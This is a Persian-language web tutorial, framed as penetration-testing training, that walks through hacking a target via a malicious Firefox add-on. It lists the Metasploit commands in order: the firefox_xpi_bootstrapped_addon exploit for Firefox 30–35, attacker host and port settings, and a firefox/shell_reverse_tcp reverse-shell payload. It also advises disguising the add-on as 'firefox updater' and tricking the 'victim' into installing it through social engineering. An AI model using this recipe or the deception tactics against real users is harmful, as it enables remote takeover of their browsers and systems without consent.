آموزش تست نفوذ و هک با افزونه فایرفاکس

هک با افزونه

در این قسمت از آموزش قصد داریم نحوه هک با افزونه و گرفتن دسترسی از سیستم قربانی برای شما شرح دهیم.

آموزش هک با افزونه فایرفاکس

در دنیای هک و امنیت که همیشه در مقابل یکدیگر قرار دارند و همیشه در رقابت بوده اند روش ها و متد های زیادی برای نفوذ و برقراری امنیت وجود دارد که یکی از روش های موجود برای گرفتن دسترسی از تارگت , استفاده از حملات سمت مرورگر است و شما می توانید با استفاده از این روش با توجه به ورژن مرورگر هدف خود اقدام به تست نفوذ کنید .

افزونه فایرفاکس چیست ؟

افزونه های فایرفاکس به ابزار ها و سرویس هایی گفته می شود که می توانید با نصب آن ها بر روی مرورگر خود امکاناتی را برای خود در مرورگر اضافه کنید و از ان ها استفاده کنید ؛ پیش تر در آموزش اوسینت که بر روی سایت برای شما قرار داده ایم با بعضی از افزونه هایی که در زمینه جمع اوری اطلاعات استفاده می شوند کار کرده ایم که می توانید افزونه های مختلف را که برای مرورگر فایرفاکس وجود دارد را از سایت زیر که سایت اصلی و معتبر افزونه های فایرفاکس است تهیه کنید و بر روی این مرورگر نصب کنید .

https://addons.mozilla.org/en-US/firefox

چرا همیشه متخصصان امنیت بر این نکته تاکید دارند که ابزار های مورد نیاز خود را از سایت های اصلی و معتبر دانلود کنید ؟
در این آموزش متوجه می شوید که اگر سرویس های مورد نظر خود را از منابع غیر معتبر دانلود کنید و مورد استفاده قرار دهید ممکن است چه مشکلاتی برای شما به وجود می اید.

  مک ادرس سیستم خود را دستی تغییر دهید

اقدام به تست نفوذ و هک با افزونه

آموزش تست نفوذ و هک با افزونه فایرفاکس
تست نفوذ از طریق افزونه فایرفاکس

در ابتدای کار نیاز به سیستم عامل کالی لینوکس دارید که اگر با کالی لینوکس آشنایی ندارید بهتر است آموزش کالی لینوکس را در پن تست کور مشاهده کنید. در قدم اول سیستم عامل کالی لینوکس خود را بوت کنید و سپس با اجرای دستور زیر در ترمینال خود، ابزار قدرتمند متاسپلویت را اجرا کنید.

msfconsole

نکته : اکسپلویتی که در این قسمت از آموزش با ان کار خواهیم کرد
بر روی مرورگر فایرفاکس نسخه 30 الی 35 پاسخو است.

حال نیز باید با استفاده از دستور use اکسپلویت مورد نظر خود را به فریمورک متاسپلویت معرفی کنید :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon

سپس با استفاده از دستور زیر اقدام به مشاهده آپشن های موجود کنید :

show options

آموزش تست نفوذ و هک با افزونه فایرفاکس
مرحله اول نحوه هک با افزونه فایرفاکس

مراحل تست نفوذ از طریق افزونه

با استفاده از دستور زیر یک نام برای افزونه خود انتخاب کنید.

برای مثال می توانید از firefox updater استفاده کنید تا هدف شما به نام وارد شده توسط شما شک نکند.

ما در این قسمت از نام pentestcore استفاده کرده ایم :

“set ADDONNAME “pentestcore

در این مرحله باید ای پی و پورت مورد نظر خود را به صورت زیر ست کنید :

set SRVHOST 192.168.1.2

set SRVPORT 6060

نکته : در قسمت بالا باید ای پی سیستم عامل کالی لینوکس خود را وارد کنید که اگر با دستورات لینوکس آشنایی ندارید می توانید اموزش دستورات مهم لینوکس که پیش تر برای شما بر روی سایت قرار داده ایم مراجعه کنید که دستورات پرکاربرد لینوکس را در ان برای شما شرح داده ایم.

سپس باید URIPATH را ست نمایید که ما بر روی مسیر ریشه قرار می دهیم

/ set URIPATH

آموزش تست نفوذ و هک با افزونه فایرفاکس
مرحله دوم نحوه هک با افزونه فایرفاکس

در این مرحله باید پیلود خود را تنظیم کنید که در این قسمت ما از پیلود زیر استفاده می کنیم :

set payload firefox/shell_reverse_tcp

سپس با استفاده از دستور زیر اکسپلویت را اجرا می کنیم :

exploit

آموزش تست نفوذ و هک با افزونه فایرفاکس
مرحله اخر نحوه هک با افزونه فایرفاکس

حال نیز یک لینک مخرب در اختیار شما قرار خواهد گرفت که باید لینک مخرب را از طریق روش های مهندسی اجتماعی به تارگت خود دهید. سپس اگر قربانی شما بر روی لینک کلیک کند به صفحه ای در فایرفاکس منتقل می شود که یک پیغامی برای او به نمایش در می اید که به او پیشنهاد نصب افزونه را داده است که اگر بر روی مرورگر خود نصب کند و از ورژن اسیب پذیر فایر فاکس استفاده کرده باشد میتوانید از ان دسترسی بگیرید .

  امنیت سایت مورد نظر خود را برسی کنید

اهمیت مهندسی اجتماعی در تست نفوذ و هک با افزونه فایرفاکس

مهندسی اجتماعی روشی بسیار کار امد است که نیاز به هیچ دانش تخصصی ندارد و تنها به میزان خلاقیت شما بستگی دارد و در اینجا شما باید از روش های خلاقانه  جهت فریب زدن تارگت خود استفاده کنید و تارگت خود را متقاعد کنید تا افزونه را بر روی مرورگر خود نصب کند.

آموزش تست نفوذ و هک با افزونه فایرفاکس
آموزش نفوذ از طرق افزونه مرورگر

نتیجه گیری

در این قسمت از آموزش شما را با نحوه تست نفوذ و هک با افزونه فایرفاکس آشنا کرده ایم و حال نیز متوجه شدید که دنیای تست نفوذ و امنیت چقدر گسترده است و شما برای پیشرفت در هر کدام از شاخه های موجود باید تلاش به شدت بالایی داشته باشید تا در مراحل تست نفود بتوانید در کمترین زمان ممکن بهترین نتیجه را بگیرید .

موفق باشید.

0/5 (0 نظر)

مطالب مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *